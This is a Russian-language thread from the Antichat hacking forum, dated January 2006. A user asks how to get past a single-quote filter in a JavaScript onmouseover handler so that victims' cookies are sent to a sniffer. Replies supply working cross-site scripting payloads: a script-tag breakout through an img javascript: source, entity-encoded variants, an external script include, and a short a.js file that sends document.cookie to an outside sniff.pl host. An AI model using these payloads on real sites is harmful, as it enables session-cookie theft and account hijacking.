ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблема в JavaScripts... Возможно ли такое?
  #1  
Старый 05.01.2006, 01:53
Аватар для FoGorm
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810

Репутация: 10
По умолчанию Проблема в JavaScripts... Возможно ли такое?

Есть такая функция вывода текста:
function show(text) {
var s;
s='<FONT STYLE="FONT-SIZE: 8pt;">'+text+'</FONT>';
hint1.innerHTML=s;
SetPosition();
hint1.style.visibility='visible';
}

Она выводит на экран текст таким образом
onmouseover="show('ТЕКСТ');"

Помогите пожалуйста, можно ли вставить в show('СЮДА') еще одну ява функцию (например: alert(document.cookie) если не розрешается использовать символ " ' " (одинарной кавычки), он заменяется на ‘ Также розрешается использовать любые символы вида &quot; , &amp; , &lt; и т.к.
P.S. Если допускалось использование одинарной кавчки, я бы сделал так
onmouseover="show('ТЕКСТ');alert(document.coo kie);('');", т.е. просто бы вставил ');alert(document.cookie);('

Но увы так нельзя... поэтому пришлось обращаться к вам за помощью
 
Ответить с цитированием

  #2  
Старый 05.01.2006, 02:40
Аватар для FoGorm
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810

Репутация: 10
По умолчанию

Уже нашел одно из решений, но всерано не могу добиться главного:
Вот такое проходит: </script><img src=javascript:alert(document.cookie);><script>
Но мне нужно чтобы кукисы не выводились а отправлялись на сниффер. Написал вот так вот:
</script><img src=javascript:document.images[0].src=http://adress/sniff.php?+document.cookie;><script>
Но выводит синтаскичискую ошибку... помогите розобраться, напомнаю использовать " ' " (одинарную кавычку) нельзя
 
Ответить с цитированием

  #3  
Старый 05.01.2006, 23:34
Аватар для FoGorm
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810

Репутация: 10
По умолчанию

хана.. что за форум.. одно молчание
 
Ответить с цитированием

  #4  
Старый 05.01.2006, 23:47
Аватар для Abra
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362

Репутация: 175
По умолчанию

src="http://adress/sniff.php?"+document.cookie;>
так попробуй. Двойные ковычки то использывать можно?
 
Ответить с цитированием

  #5  
Старый 05.01.2006, 23:58
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Масса способов.
Например
</script><img src=javascript:document.images[0].src=&quot;http://adress/sniff.php?+document.cookie;&quot;><script>

А вообще см. http://antichat.ru/crackchat/HTML/
Там все есть.
 
Ответить с цитированием

  #6  
Старый 06.01.2006, 00:01
Аватар для FoGorm
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810

Репутация: 10
По умолчанию

думаю двойные кавчки здесь не выход.. т.к. елси поставить двойную кавычку, то она закроет onmouseover=" вот эту.. но этого делать нельзя(
 
Ответить с цитированием

  #7  
Старый 06.01.2006, 00:23
Аватар для FoGorm
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810

Репутация: 10
По умолчанию

&lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+document....&lt;script&gt;

В итогде это все работает, но там стоит ограничение на кол-во символов.. так что если возможно.. то нужно сделать длинной не больше чем &lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+... вот посюда оно его обрезает.. последний штрих
 
Ответить с цитированием

  #8  
Старый 06.01.2006, 00:27
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

</script><script src=http://blablabla.ru/a.js></script>
 
Ответить с цитированием

  #9  
Старый 06.01.2006, 00:33
Аватар для FoGorm
FoGorm
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810

Репутация: 10
По умолчанию

Если можешь, напиши содержимое .js файла.. а то я плохо в яве розбираюсь, но то что ты предложил понял, и мне это видимо подходит...
 
Ответить с цитированием

  #10  
Старый 06.01.2006, 00:40
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

a.js :
Код:
i = new Image();
i.src="http://mysite.ru/sniff.pl?"+document.cookie;

Последний раз редактировалось Algol; 06.01.2006 в 00:42..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакеры и кракеры или "Что такое хорошо и что такое плохо?" foreva Чужие Статьи 12 09.02.2008 12:26
Проблема с установкой proxy Utochka Уязвимости 3 09.05.2006 01:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ